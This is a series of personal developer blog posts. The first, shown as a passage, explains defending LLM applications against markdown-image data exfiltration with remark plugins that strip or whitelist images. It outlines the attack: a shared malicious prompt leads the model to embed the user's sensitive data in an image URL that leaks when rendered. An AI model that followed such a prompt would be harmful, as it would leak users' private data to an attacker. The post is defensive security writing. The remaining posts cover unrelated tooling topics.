Disable Markdown Image Embedding: The most straightforward approach is to entirely disable the image embedding functionality within your markdown parser.
Implement a Whitelist: Allow images to be embedded only from trusted domains by creating a whitelist of allowed hosts.

Example Code: Protecting Your LLM Application

Let's look at some practical TypeScript examples using the remark library for rendering markdown to HTML:

Disabling Image Embedding

import { remark } from "remark";
import html from "remark-html";
import { visit } from "unist-util-visit";

interface ImageNode {
  type: "image";
  url: string;
}

type MarkdownNode = ImageNode | any;

// Function to remove all image tags
const removeImage = (): ((tree: MarkdownNode) => void) => {
  return (tree: MarkdownNode) => {
    visit(
      tree,
      "image",
      (node: ImageNode, index: number | undefined, parent: MarkdownNode) => {
        parent.children.splice(index!, 1); // Remove the image tag
      }
    );
  };
};

const markdown = `# Example Markdown
This is a paragraph.
![An image](https://example.com/image.png)
Another paragraph.
`;

remark()
  .use(removeImage)
  .use(html)
  .process(markdown, function (err, file) {
    if (err) throw err;
    console.log(String(file));
  });

Whitelisting Trusted Hosts

import { remark } from "remark";
import html from "remark-html";
import { visit } from "unist-util-visit";
const trustedHosts = ["https://example.com"]; // Manage your whitelist here

interface ImageNode {
  type: "image";
  url: string;
}

type MarkdownNode = ImageNode | any;

const safeImageEmbedding = (): ((tree: MarkdownNode) => void) => {
  return (tree: MarkdownNode) => {
    visit(
      tree,
      "image",
      (node: ImageNode, index: number | undefined, parent: MarkdownNode) => {
        if (!trustedHosts.some((host) => node.url.startsWith(host))) {
          parent.children.splice(index!, 1); // Remove untrusted image tags
        }
      }
    );
  };
};

const markdown = `# Example Markdown
This is a paragraph.
![An image](https://example.com/image.png)
Another paragraph.

This is a dangerous image, but it will be removed by the safeImageEmbedding function
![An image](http://nottrusted.com/image.png)
`;

remark()
  .use(safeImageEmbedding)
  .use(html)
  .process(markdown, function (err, file) {
    if (err) throw err;
    console.log(String(file));
  });

Important: These methods provide a layer of protection but don't guarantee complete security. Thoroughly test your implementation to ensure it meets your specific security needs. While you could attempt to use regular expressions to replace image tags, this approach is prone to errors. Escape characters or cleverly crafted input could bypass your regex patterns. Directly manipulating the Abstract Syntax Tree (AST) parsed by your markdown library is a much more robust and reliable solution.

Why This Matters, Especially for UGC

Services that encourage user-generated content (UGC), such as platforms for sharing LLM prompts, are particularly vulnerable:

A malicious user shares a seemingly helpful prompt.
An unsuspecting user inputs this prompt into their LLM application.
The LLM, potentially employing in-context learning, generates a response that incorporates the user's sensitive data within a crafted image URL.
The malicious user receives the leaked data when the image is rendered.

Remember: This vulnerability extends beyond LLM applications. It's crucial to stay informed about security best practices for handling user-generated content and data privacy in any online service.

References

Web Distiller AI: A Chrome Extension for Summarizing Web Pages

Sat, 06 Jul 2024 00:00:00 GMT

import Twitter from '../../../components/Twitter.astro';

I’ve been working on: chrome-extension-web-distiller-ai, a Chrome extension designed to summarize web page contents using the built-in Gemini Nano model. This project utilizes local LLM technology to offer secure and efficient in-browser summarization without transmitting any content to external networks.

Key Features

Summarization: Extracts and summarizes the main content of the currently viewed web page.
Translation Options: Offers translation of summaries into English or Japanese.
Markdown Output: Converts the extracted content into markdown format for easy readability.
Clipboard Copy: Provides a convenient button to copy the summary to the clipboard.

Development Challenges

During the development of this extension, I encountered several challenges:

Context Length Issues: When the content exceeded the context length, I faced a NotReadableError: The execution yielded a bad response. error. Unfortunately, the current built-in Gemini Nano model in Chrome does not have publicly available specifications regarding its context length limit. I hope that these specifications will be published in the future.
Unpredictable Errors: Certain content types caused similar errors during generation, and the exact cause remains unclear. This unpredictability required additional handling in the extension.
Quality of Output: Initially, performing both summarization and translation in a single prompt significantly degraded the quality of the output. To resolve this, I separated the processes into distinct prompts, which improved the overall performance and quality.

Reflections

Developing Web Distiller AI has been an enlightening experience. Here are some of my thoughts:

Expanded Utility: The ability to utilize LLM functionalities with just a properly set up Chrome browser represents a significant leap forward. This expands the practical utility of such models across various use cases.
Potential for Web Services: While I developed this as a Chrome extension, it would also be interesting to implement it as a resident assistant on a web service platform. This could provide even more accessibility and convenience for users.
Future of Gemini Nano: As a multimodal LLM, Gemini Nano holds tremendous potential. I look forward to the day when Chrome can handle not just text processing but also image OCR and voice recognition using this technology.

You can check out the Web Distiller AI repository on GitHub to learn more about the project and try it out yourself.

Improving Web Scraping with Readability and Table Support in Markdown

Tue, 18 Jun 2024 00:00:00 GMT

I previously used DOM Distiller for content extraction in my project cloudflare-dom-distiller. However, I have recently switched to Readability because it produces more visually appealing results. This change has significantly improved the markdown output, removing unwanted headers and footers and enhancing the overall look.

Additionally, I have implemented support for the <table> tag to output tables in Markdown format. For converting HTML to Markdown, I use turndown, which has a plugin for GitHub Flavored Markdown (GFM), turndown-plugin-gfm. Integrating this plugin has enabled seamless table conversion in Markdown.

While searching for similar functionalities, I came across an interesting open-source project and SaaS, jina-ai/reader. This tool not only offers features comparable to cloudflare-dom-distiller but also includes web search capabilities, utilizing puppeteer to access the Brave search engine. For those seeking more advanced features, jina-ai/reader is a promising option.

Enhancing Personal Knowledge Management with Pocket and Obsidian Integration

Thu, 13 Jun 2024 00:00:00 GMT

Introduction

For my personal and professional needs, I rely on two powerful tools: Pocket for collecting and storing articles, and Obsidian for organizing and synthesizing my thoughts. This blog post explores how I integrated these tools to streamline my workflow and enhance productivity.

Using Pocket for Information Collection

Pocket is my go-to tool for gathering information from the internet. It's incredibly convenient to save articles and use them later for discussions with colleagues or casual conversations. The ability to have a curated library of articles at my fingertips significantly enhances the quality of my interactions and keeps me well-informed.

Organizing Thoughts with Obsidian

For organizing my personal thoughts and research, I use Obsidian. This powerful note-taking app allows me to create a structured and interconnected knowledge base. When transferring content from Pocket to Obsidian, I often refer back to the articles I've saved in Pocket. However, manually adding links from Pocket to my Obsidian notes was becoming time-consuming.

Automating the Workflow

I wanted to find a way to automate the process of linking Pocket articles to my Obsidian notes. Since my Obsidian files are stored on iCloud and synced across my devices, I considered creating a script to fetch articles from Pocket locally.

Choosing an Independent Implementation

While implementing this directly as an Obsidian plugin was an option, I decided to take an independent approach. This would make it easier to batch process markdown files and maintain flexibility in how I manage my notes.

Implementing dom-distiller API and PocketMD

To achieve my goal, I developed two key components: the dom-distiller API and PocketMD.

dom-distiller API

I needed a way to extract essential content from saved HTML articles and convert them to markdown. This would also help reduce context length when processing with LLMs. By leveraging the chromium/dom-distiller implementation and executing content extraction scripts with Puppeteer, I achieved the desired functionality.

I developed the API to run on Cloudflare Workers, avoiding local machine load and making future integrations with tools like make (Integromat) and Zapier possible.

PocketMD

Next, I created a set of scripts called PocketMD to handle local processing of articles saved in Pocket. You can find the repository here: ainoya/PocketMD. This setup involves storing data in SQLite for easy processing and includes the following features:

Retrieve articles from Pocket and save them in SQLite.
Extract URLs from SQLite, fetch full text using the Distiller API, and save it.
Generate summaries of articles using Google Vertex AI based on the information stored in SQLite.
Convert the information to markdown format for use with Obsidian or similar applications.

By using LLMs (Google Vertex AI), I generate summaries and Obsidian keywords, automatically creating links to existing notes. This interlinking enhances my thought organization in Obsidian.

Conclusion

The integration of Pocket and Obsidian through custom scripts has significantly improved my note management and information retrieval processes. With keyword links in Obsidian, I can quickly reference saved articles, enhancing the efficiency of my thought organization.

Furthermore, the knowledge graph constructed in Obsidian aligns well with tools like Graph RAG. This allows for implementing solutions that leverage LLMs to propose resolutions across multiple articles, addressing common topics of interest.

By automating the workflow between Pocket and Obsidian, I have created a seamless, efficient system that enhances my productivity and keeps my knowledge base robust and interconnected.

Optimizing Model Load Times on EC2 with Pre-loaded AMIs

Sat, 18 May 2024 00:00:00 GMT

Recently, I encountered a challenge while working with machine learning models on Amazon EC2. To speed up the initial loading of a pre-trained model, I decided to create an Amazon Machine Image (AMI) with the model already pre-loaded. However, I discovered that the first inference run after instance startup took over ten times longer than usual. Subsequent inferences ran at normal speed.

Inference Program Overview

Here's a simplified version of the inference program I used:

model = Pipeline.from_pretrained(#some options,,,)
model = model.to(device) # This line takes an unusually long time during the first run

Upon investigating the program logs, I found that the model.to(device) line, which transfers the model to the device, was the main bottleneck. Using dstat, I monitored system resource usage and noticed that disk I/O performance was significantly slower during the initial run.

Identifying the Issue

I discovered that when using EBS volumes on EC2, the file system fetches files from S3 only when they are accessed for the first time. This behavior causes the initial I/O operations to be slow, as described in the AWS documentation:

Empty EBS volumes receive their maximum performance the moment that they are created and do not require initialization (formerly known as pre-warming). For volumes, of any volume type, that were created from snapshots, the storage blocks must be pulled down from Amazon S3 and written to the volume before you can access them. This preliminary action takes time and can cause a significant increase in the latency of I/O operations the first time each block is accessed. Volume performance is achieved after all blocks have been downloaded and written to the volume.

Implementing the Solution

To address this, I wrote a script to read the model files using the fio command at instance startup. fio is a flexible I/O tester with more options than dd, and it supports asynchronous I/O, making it faster for reading files.

Here's the fio command I used:

fio --name="read_test" --filename="$file" --rw=read --bs=1M --ioengine=libaio --iodepth=32 --direct=1

Alternative Solutions

Another potential solution is to use EBS fast snapshot restore, which preloads snapshots and eliminates the initial load time overhead. However, this option incurs additional costs, so I opted not to use it in this case.

Conclusion

Instances created from EBS volumes with pre-loaded models experience slow initial model loads due to the S3-to-EBS fetch process. This issue is more pronounced with larger model files.
Using fio to read model files at startup mitigates this problem by preloading data, significantly reducing initial load times.
Alternative solutions include using fast snapshot restore or other high-performance distributed storage solutions like Parallelstore or DAOS.

References

Accelerating Company Culture And Value Assimilation Among Employees Through Generative AI

Mon, 06 May 2024 00:00:00 GMT

Introduction

Maintaining and reinforcing a company's culture and values among employees can be a challenging task. It's crucial for employees to be consistently aware of these values to sustain and enrich the company's culture. Implementing systems that simplify this awareness and empower employees according to these values is essential. However, amidst busy work schedules, it can become difficult to continually focus on these values. At GitLab, a novel approach involves using emojis linked to company values to remind employees of these principles regularly. This blog explores how we can leverage tools like Zapier and OpenAI to further facilitate the integration of company values among team members.

Using Value Emojis to Foster Awareness

At GitLab, value emojis are a core part of daily communication, helping to embed company values in everyday interactions. When someone posts a value emoji in Slack, it's automatically shared in a dedicated channel via the Reacji Channeler, promoting value-driven discussions. Inspired by this, I experimented with a setup that could automate and quantify the representation of company values within team communications.

Weekly Retrospectives with Value Emoji Summaries

To facilitate reflection on value alignment in team meetings, I created two Zaps:

Capturing Slack posts with value emoji reactions and saving them to a Zapier Table.
Triggering a collection of the past week's posts when @value-bot retrospective is mentioned in Slack, summarizing and posting the frequency of each emoji used.

This system allowed the team to easily recall discussions from the past week and focus on areas needing improvement in terms of value alignment, making our weekly retrospectives more efficient and focused.

Automating Value-Based Evaluations of Communications

Building on the previous automation, I developed a method to summarize and evaluate team communications based on adherence to company values using Google Sheets and OpenAI API:

Storing Slack posts in Google Sheets.
Triggering a summary and evaluation of these posts in Slack when @value-bot value rating is mentioned.

The prompt for the AI was structured to assess the content against our defined company values, providing a rating from 1 to 5, where 1 is the lowest and 5 is the highest. This method provides a gamified, unbiased feedback mechanism, engaging employees in a fun and interactive review of their communications.

Prompt example:

Please evaluate the Slack log for today based on the evaluation criteria on a scale of 1 to 5, where 1 is the lowest and 5 is the highest rating.
The team members are Alice, Bob, and Charlie. Please focus on their statements for evaluation.

The evaluation criteria are as follows:

1. Value 1: {Value1 Explanation...}
2. Value 2: {Value2 Explanation...}

---Below is the content of the Slack log---
{Here, expand the list of Slack posts obtained in the previous step on Zapier}

Conclusion

By combining Zapier and OpenAI, I was able to create an advanced system for ingraining company values within the team's daily operations. The automation provides a bias-free way to reflect on and enhance our adherence to these values. However, it's important to remember that AI-generated evaluations can be imperfect. They should not directly affect employee evaluations or appraisals but instead serve as a casual reminder and reinforcement of company values. This system is highly recommended for companies looking to deepen value integration in a fun and engaging way.

Reference

Using the Web Crypto API for Secure Encryption and Decryption

Sat, 04 May 2024 00:00:00 GMT

Securely managing sensitive information such as API keys in web services is crucial. My focus was on encrypting this data in a decryptable manner without depending on Node.js libraries, particularly in environments like Cloudflare Workers. This led me to explore the Web Crypto API, which provides a robust solution for secure cryptographic operations directly in the browser, free from Node.js Library dependencies.

Why Web Crypto API?

I chose the Web Crypto API for its strong security features and broad support across modern browsers. Importantly, it operates in restricted environments like Cloudflare Workers, making it ideal for my requirements.

For encryption and decryption, I implemented the AES-256-GCM method. This choice was influenced by GitLab's cryptographic standards, which suggests AES-256 for "future-proofing" despite potential performance impacts.

Implementation Code

Below is the TypeScript code for encryption and decryption, which can be included in your projects:

// ~/utils/encryptor.server.ts
// Purpose: Encryptor utility for encrypting and decrypting data.
const algorithm = "AES-GCM";

function base64ToArrayBuffer(base64: string): ArrayBuffer {
  const binaryString = atob(base64);
  const len = binaryString.length;
  const bytes = new Uint8Array(len);
  for (let i = 0; i < len; i++) {
    bytes[i] = binaryString.charCodeAt(i);
  }
  return bytes.buffer;
}

function arrayBufferToBase64(buffer: ArrayBuffer): string {
  let binary = "";
  const bytes = new Uint8Array(buffer);
  const len = bytes.byteLength;
  for (let i = 0; i < len; i++) {
    binary += String.fromCharCode(bytes[i]);
  }
  return btoa(binary);
}

export async function encrypt(
  data: string,
  keyBase64Encoded: string
): Promise<string> {
  const keyBuffer = base64ToArrayBuffer(keyBase64Encoded);

  const cryptoKey = await crypto.subtle.importKey(
    "raw",
    keyBuffer,
    { name: algorithm, length: 256 },
    false,
    ["encrypt"]
  );

  const iv = crypto.getRandomValues(new Uint8Array(12));
  const encryptedData = await crypto.subtle.encrypt(
    { name: algorithm, iv: iv },
    cryptoKey,
    new TextEncoder().encode(data)
  );

  const combined = new Uint8Array(iv.length + encryptedData.byteLength);
  combined.set(iv, 0);
  combined.set(new Uint8Array(encryptedData), iv.length);

  return arrayBufferToBase64(combined);
}

export async function decrypt(
  data: string,
  keyBase64Encoded: string
): Promise<string> {
  const keyBuffer = base64ToArrayBuffer(keyBase64Encoded);
  const dataBuffer = base64ToArrayBuffer(data);

  const iv = dataBuffer.slice(0, 12);
  const encrypted = dataBuffer.slice(12);

  const cryptoKey = await crypto.subtle.importKey(
    "raw",
    keyBuffer,
    { name: algorithm, length: 256 },
    false,
    ["decrypt"]
  );

  const decrypted = await crypto.subtle.decrypt(
    { name: algorithm, iv: new Uint8Array(iv) },
    cryptoKey,
    encrypted
  );

  return new TextDecoder().decode(decrypted);
}

Testing the Implementation

Here's a test script to ensure the functionality works as expected:

// test/util/encryptor.server.test.ts
// test encrypt and decrypt

import { expect, test } from "vitest";

import { encrypt, decrypt } from "~/utils/encryptor.server";
import crypto from "crypto";

test("encrypt and decrypt", async () => {
  // random 32 bytes key
  const key = crypto.randomBytes(32);
  const data = "test_data";

  const encrypted = await encrypt(data, key.toString("base64"));

  const decrypted = await decrypt(encrypted, key.toString("base64"));

  expect(decrypted).toBe(data);

  // data is encrypted
  expect(encrypted).not.toBe(data);

  // cannot decrypt with wrong key
  const wrongKey = crypto.randomBytes(32);
  // wrong decryption will throw error
  await expect(
    decrypt(encrypted, wrongKey.toString("base64"))
  ).rejects.toThrow();
});

Conclusion

The Web Crypto API provides a powerful, platform-independent tool for encrypting and decrypting sensitive information, even within the limited environments like Cloudflare Workers.

Note: The code provided in this article does not guarantee operational security. Please use it at your own risk.

References

Web Crypto API - Web APIs | MDN

Revisiting: Generating OpenAI API Client with Kiota from OpenAPI Spec

Wed, 07 Feb 2024 00:00:00 GMT

In a previous exploration, I utilized the openapi-generator tool to create a Java client for the OpenAI API. Recently, I discovered another generator named Microsoft Kiota, prompting me to investigate whether it could offer a more user-friendly experience for generating API clients.

Just like before, modifications to the original OpenAI OpenAPI specification were necessary, but I successfully generated the client. The resulting work is available at ainoya/openai-kiota-client-java.

Generating the client with Kiota is straightforward, done through the command line. A notable difference from openapi-generator is the reduced number of options required during code generation, which reduces cognitive load—a welcomed change.

docker run -v ${PWD}:/app/output \
        -v /${PWD}/openapi.yaml:/app/openapi.yaml \
        mcr.microsoft.com/openapi/kiota generate \
        -d /app/openapi.yaml \
        --language java \
        -n dev.ainoya.kiota.openai.generated \
        -o /app/output/src/main/java/dev/ainoya/kiota/openai/generated

The detailed modifications made to the OpenAPI spec can be understood by comparing diffs in the repository, but key changes include adding a discriminator to enable type mapping, which helps eliminate warnings. Since OpenAI's API server seems to be written in Python, the type handling in responses is generally loose.

     ChatCompletionRequestMessage:
+      discriminator:
+        propertyName: role
       oneOf:
         - $ref: "#/components/schemas/ChatCompletionRequestSystemMessage"
         - $ref: "#/components/schemas/ChatCompletionRequestUserMessage"

For instances where the API could return either a string or an object, making it challenging to define a discriminator, I opted to comment out the string return type. It's a workaround due to the API's loose type constraints on certain parameters, indicating a preference for more strict typing from an API consumer perspective.

@@ -5616,11 +5620,11 @@ components:

         `none` is the default when no functions are present. `auto` is the default if functions are present.
       oneOf:
-        - type: string
-          description: >
-            `none` means the model will not call a function and instead generates a message.
-            `auto` means the model can pick between generating a message or calling a function.
-          enum: [none, auto]
+#        - type: string
+#          description: >
+#            `none` means the model will not call a function and instead generates a message.
+#            `auto` means the model can pick between generating a message or calling a function.
+#          enum: [none, auto]
         - $ref: "#/components/schemas/ChatCompletionNamedToolChoice"
       x-oaiExpandable: true

The Usability of the Generated Code

Utilizing Kiota brings several benefits, as highlighted in the official documentation, including reduced maintenance cost across different language SDKs, less redundancy in templates, and a consistent feature set across languages. These advantages mainly benefit SDK developers but indirectly enhance the experience for SDK consumers by providing well-maintained tools.

An example of using the generated code for a Chat completion request is straightforward and similar to using code generated by openapi-generator, but with less boilerplate, such as not needing to write setActualInstance methods. This simplicity could be seen as a significant advantage of Kiota.

package dev.ainoya.kiota.openai.example;

import com.microsoft.kiota.ApiException;
import com.microsoft.kiota.authentication.AccessTokenProvider;
import com.microsoft.kiota.authentication.AllowedHostsValidator;
import com.microsoft.kiota.authentication.BaseBearerTokenAuthenticationProvider;
import com.microsoft.kiota.http.OkHttpRequestAdapter;
import com.microsoft.kiota.serialization.*;
import dev.ainoya.kiota.openai.generated.ApiClient;
import dev.ainoya.kiota.openai.generated.models.*;
import okhttp3.*;
import okhttp3.logging.HttpLoggingInterceptor;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;

import java.net.URI;
import java.util.List;
import java.util.Map;

class ExampleBearerTokenProvider implements AccessTokenProvider {
    // https://learn.microsoft.com/en-us/openapi/kiota/authentication?tabs=java

    @NotNull
    @Override
    public String getAuthorizationToken(@NotNull URI uri, @Nullable Map<String, Object> additionalAuthenticationContext) {
        // get token from env variable "OPENAI_API_KEY"
        return System.getenv("OPENAI_API_KEY");
    }

    @NotNull
    @Override
    public AllowedHostsValidator getAllowedHostsValidator() {
        return new AllowedHostsValidator(
                "openai.com"
        );
    }
}

public class ExampleApp {

    public static void main(String[] args) {
        final BaseBearerTokenAuthenticationProvider authProvider = new BaseBearerTokenAuthenticationProvider(new ExampleBearerTokenProvider());

        HttpLoggingInterceptor logging = new HttpLoggingInterceptor().setLevel(
                HttpLoggingInterceptor.Level.BASIC
                // if set level to BODY, kiota client will not work because of the response body is consumed by the interceptor
        );

        Call.Factory httpClient = new OkHttpClient.Builder()
                .addNetworkInterceptor(logging)
                .build();

        ParseNodeFactory parseNodeFactory = ParseNodeFactoryRegistry.defaultInstance;
        SerializationWriterFactory serializationWriterFactory = SerializationWriterFactoryRegistry.defaultInstance;
        final OkHttpRequestAdapter requestAdapter = new OkHttpRequestAdapter(authProvider,
                null,
                null,
                httpClient
        );


        ApiClient client = new ApiClient(requestAdapter);

        final CreateChatCompletionRequest request = getCreateChatCompletionRequest();

        try {
            CreateChatCompletionResponse post = client
                    .chat().completions().post(request);

            // debug response
            if (post != null) {
                var choices = post.getChoices();
                if (choices != null) {
                    for (var choice : choices) {
                        if (choice.getMessage() != null) {
                            System.out.println(choice.getMessage().getContent());
                        }
                    }
                } else {
                    System.out.println("choices is null");
                }
            } else {
                System.out.println("post is null");
            }
        } catch (ApiException e) {
            // handle as ApiException
            System.out.println(e.getLocalizedMessage());
        }

    }

    @NotNull
    private static CreateChatCompletionRequest getCreateChatCompletionRequest() {
        final CreateChatCompletionRequest request = new CreateChatCompletionRequest();

        final CreateChatCompletionRequest.CreateChatCompletionRequestModel model = new CreateChatCompletionRequest.CreateChatCompletionRequestModel();
        model.setString("gpt-4-turbo-preview");

        request.setModel(
                model
        );

        request.setMaxTokens(100);


        ChatCompletionRequestMessage message = new ChatCompletionRequestMessage();
        ChatCompletionRequestUserMessage userMessage = new ChatCompletionRequestUserMessage();

        ChatCompletionRequestMessageContentPart contentPart = new ChatCompletionRequestMessageContentPart();

        ChatCompletionRequestMessageContentPartText partText = new ChatCompletionRequestMessageContentPartText();
        partText.setText("What is the meaning of life?");
        partText.setType(ChatCompletionRequestMessageContentPartTextType.Text);

        contentPart.setChatCompletionRequestMessageContentPartText(
                partText
        );

        userMessage.setContent(List.of(
                contentPart
        ));

        userMessage.setRole(
                ChatCompletionRequestUserMessageRole.User
        );

        message.setChatCompletionRequestUserMessage(userMessage);
        List<ChatCompletionRequestMessage> messages = List.of(
                message
        );

        request.setMessages(
                messages
        );
        return request;
    }
}

Deep Dive into maybe-finance/maybe

Thu, 01 Feb 2024 00:00:00 GMT

Introduction

A startup that was developing a personal asset management app recently ceased operations. However, in a commendable move, they have open-sourced their service on GitHub. You can find the repository at maybe-finance/maybe. From the README, it's apparent that they invested over $1,000,000 in the development of this app. It's quite rare to see such a large-scale, production-grade application code released to the public. With an interest in studying modern application development techniques, I delved into the code and structure of maybe-finance/maybe.

Overview of the Structure

According to their Monorepo File Structure Overview, the backend and frontend are both written in TypeScript. The repository adopts a monorepo structure managed by Nx, known for its rich plugin system and various features. For monorepo projects using Next.js, considering turborepo might be beneficial, especially since it's backed by Vercel.

As of commit 0575beb5138a3f7644a69b0d7a76fad96b1f8d84, the directory tree is as follows:

$ tree -d -L 2
.
├── apps
│   ├── client
│   ├── e2e
│   ├── server
│   └── workers
├── libs
│   ├── client
│   ├── design-system
│   ├── server
│   ├── shared
│   └── teller-api
├── prisma
│   └── migrations
└── tools
    ├── generators
    ├── pages
    ├── scripts
    └── test-data

The GitHub wiki includes a decision tree guide on where to place which type of code. Such visual guides are invaluable for developers joining a project with an extensive directory structure.

Monorepo File Structure Overview · maybe-finance/maybe Wiki

Used Libraries

Frontend

React Framework: Next.js
CSS Framework: tailwind
headless UI
Testing Frameworks: jest, react-testing-library, cypress

Backend

Database: PostgreSQL
ORM: prisma, with shared data model definitions between client and server.
Web Application Framework: express. There are backend implementations in Next.js using prismaClient to directly access the DB, but most implementations rely on express.
Worker: Bull, a job queue library for Node.js using redis for job management. It's used for asynchronous processing of communications with external services like Teller, enhancing system stability and UX. It also functions as a cron scheduler.
Necessary middleware configurations are available in the docker-compose.yml.

Software Design

Frontend

Utilizes Next.js's Page Router mode, operating in SSR. A vercel.json suggests hosting on Vercel.
Components that can be separated are modularized and managed with Storybook. This approach clarifies semantics, as a large number of tailwind class names can become unclear.
Avoids complex state management frameworks like Redux or Jotai, instead using a combination of hooks and react-query for simple state management. This approach is sufficient until the complexity of state management becomes an issue.

Backend

Actively uses Constructor Injection for DI. For instance, the IQueueFactory interface, implemented by classes like InMemoryQueueFactory and BullQueueFactory, facilitates easy swapping of persistence layers to in-memory during testing and debugging. Interfaces and their implementations use the class syntax. This DI paradigm is familiar to those primarily involved in backend development. Although factory methods for structuring objects are also common in TypeScript, the choice between these two approaches can vary.

DI Using Class

interface KVStore {
    get(key: string): Promise<string | null>;
    set(key: string, value: string): Promise<void>;
}

class RedisKVStore implements KVStore {
    // Initialization of the Redis client, etc.

    async get(key: string): Promise<string | null> {
        // Logic to retrieve the value from Redis
    }

    async set(key: string, value: string): Promise<void> {
        // Logic to set the value in Redis
    }
}

DI Using Factory Method

type KVStore = {
    get: (key: string) => Promise<string | null>;
    set: (key: string, value: string) => Promise<void>;
};

function createRedisKVStore(): KVStore {
    return {
        async get(key: string): Promise<string | null> {
            // Logic to retrieve the value from Redis
        },
        async set(key: string, value: string): Promise<void> {
            // Logic to set the value in Redis
        }
    };
}

Conclusion

The code is well-organized and consistently designed. The inclusion of generator code and docker-compose reflects a consideration for easy onboarding. Monorepo structures allow for a comprehensive overview with a single repository checkout. However, as the codebase expands, such oversight can become limited, making documents like the decision tree crucial for understanding.
I plan to continue exploring and writing about interesting OSS products, much like this analysis.

Update on 2024/02/07

A significant rewrite from React/Next.js to Ruby on Rails is underway at maybe-finance/maybe.

Where is Dropout Configured in SimCSE?

Sun, 28 Jan 2024 00:00:00 GMT

In the unsupervised learning approach of SimCSE, two identical sentences are vectorized using the Transformer encoder to train a sentence embedding model. A key aspect of this process is the role of Dropout settings within the Transformer, which act as 'noise'. This noise ensures that, even though the two sentences are the same, they generate distinct vectors during training. This concept, as discussed in the paper, functions similarly to contrastive learning in image recognition, applying effectively to natural language learning.

While studying SimCSE, I initially encountered confusion regarding the implementation of Dropout. My initial assumption was that Dropout would be configured in the head part of the model that compares the two sentences during training, possibly in an MLP (Multi-Layer Perceptron). However, a closer reading of the paper clarified that the Dropout referred to is actually the one within the internal layers of the Transformer. This realization resolved my confusion.

For instance, in models like BERT, Dropout is configured in various layers including the attention and forward layers, as shown in the following code snippet:

from transformers import AutoModel

base_model_name = "cl-tohoku/bert-base-japanese-v3"
testmodel = AutoModel.from_pretrained(base_model_name)

print(testmodel)
# BertModel(
#   (embeddings): BertEmbeddings(
#     (word_embeddings): Embedding(32768, 768, padding_idx=0)
#     (position_embeddings): Embedding(512, 768)
#     (token_type_embeddings): Embedding(2, 768)
#     (LayerNorm): LayerNorm((768,), eps=1e-12, elementwise_affine=True)
#     (dropout): Dropout(p=0.1, inplace=False)
#   )
#   (encoder): BertEncoder(
#     (layer): ModuleList(
#       (0-11): 12 x BertLayer(
#         (attention): BertAttention(
#           (self): BertSelfAttention(
#             (query): Linear(in_features=768, out_features=768, bias=True)
#             (key): Linear(in_features=768, out_features=768, bias=True)
#             (value): Linear(in_features=768, out_features=768, bias=True)
#             (dropout): Dropout(p=0.1, inplace=False)
#           )
#           (output): BertSelfOutput(
#             (dense): Linear(in_features=768, out_features=768, bias=True)
#             (LayerNorm): LayerNorm((768,), eps=1e-12, elementwise_affine=True)
#             (dropout): Dropout(p=0.1, inplace=False)
#           )
#         )
#         (intermediate): BertIntermediate(
#           (dense): Linear(in_features=768, out_features=3072, bias=True)
#           (intermediate_act_fn): GELUActivation()
#         )
#         (output): BertOutput(
#           (dense): Linear(in_features=3072, out_features=768, bias=True)
#           (LayerNorm): LayerNorm((768,), eps=1e-12, elementwise_affine=True)
#           (dropout): Dropout(p=0.1, inplace=False)
#         )
#       )
#     )
#   )
#   (pooler): BertPooler(
#     (dense): Linear(in_features=768, out_features=768, bias=True)
#     (activation): Tanh()
#   )
# )

This aspect of Dropout configuration is a common point of confusion, as evidenced by the numerous related issues raised in the GitHub repository of the SimCSE paper: SimCSE GitHub Issues. It's a subtle yet critical detail worth noting for anyone delving into this area.

Reference:

SimCSE: Simple Contrastive Learning of Sentence Embeddings

Improving Blog-Writing Workflow with VSCode's DevContainer and Astro

Tue, 23 Jan 2024 00:00:00 GMT

In pursuit of an efficient development workflow for my personal blog, ainoya.dev, I experimented with leveraging the capabilities of VSCode's DevContainer feature. This post details the journey of enhancing my blog development process, primarily using Astro, by integrating DevContainer into my workflow.

Introduction to DevContainer

VSCode's DevContainer offers a seamless way to containerize the development environment. This means consistent, isolated, and replicable development settings for any project. Utilizing this for my blog, written using Astro, presented an opportunity to streamline the setup and reduce startup times for the development server.

Setting Up DevContainer for Astro

The .devcontainer/devcontainer.json file is the heart of configuring the DevContainer environment. I tailored the settings to cater to my Astro blog's needs, as illustrated below:

{
    "name": "Node.js & TypeScript",
    "image": "mcr.microsoft.com/devcontainers/typescript-node:1-20-bullseye",
    "forwardPorts": [4321],
    "portsAttributes": {
        "4321": {
            "label": "Astro",
            "onAutoForward": "openBrowser"
        }
    },
    "postCreateCommand": "pnpm config set store-dir /home/node/.local/share/pnpm/store && pnpm install --frozen-lockfile",
    "postStartCommand": "nohup bash -c 'pnpm run dev &'",
    "remoteUser": "node",
    "customizations": {
        "vscode": {
            "extensions": ["astro-build.astro-vscode"]
        }
    }
}

This configuration automatically starts the Astro development server in the background upon container startup, significantly reducing the waiting time.

Resolving `pnpm install` Issues on macOS and devcontainer

The primary issue arose when running pnpm install within the DevContainer on macOS. The error message was ERR_PNPM_LINKING_FAILED, indicating a failure in the linking process during installation. This problem seemed unique to the macOS environment, particularly when used in conjunction with Docker.

Understanding the Cause

The root cause of this issue is tied to the way Docker interacts with the macOS file system. More specifically, it's related to how pnpm uses hard links to optimize dependency installations. Hard links work differently in Docker's virtualized file system on macOS compared to Linux containers, leading to the error during the copying of files. (ref)

Implementing a Solution

To address this, I modified the pnpm configuration to change the storage directory of the package store. This was achieved by adding a specific command in the postCreateCommand section of the DevContainer configuration:

"postCreateCommand": "pnpm config set store-dir /home/node/.local/share/pnpm/store && pnpm install --frozen-lockfile",

After changing the pnpm store directory, it was essential to add the new store directory, .pnpm-store, to the .gitignore file.

Using OpenAI's Assistant API with Function Calling in Chatbots

Sun, 21 Jan 2024 00:00:00 GMT

Introduction

In this post, I'll explain a common pattern in chatbot conversations involving function calling within the backend during interactions with an OpenAI Assistant API. This approach offers significant advantages in maintaining context and structuring responses. We'll delve into the benefits of using the Assistant API and Function Calling, as well as the sequence of chat interactions and operational considerations.

Benefits of the Assistant API

Thread Creation for Individual Users: The Assistant API enables the creation of threads for each user, maintaining the context of conversations. This is crucial in providing a cohesive and personalized chat experience.
Setting Instructions for the Assistant: The ability to set instructions for the assistant allows for more controlled and relevant responses, tailored to the specific needs of the application.
Ease of Testing in the Playground: The API's playground feature provides an easy-to-use environment for testing and fine-tuning the assistant’s responses.

Advantages of Function Calling

Argument Structuring: Function calling automates the process of structuring necessary arguments for function execution, making the backend processing more efficient.
Response Generation: Without the need for special prompt tuning, the assistant generates responses that align with the structure of the function arguments, ensuring consistency and relevance in the dialogue.

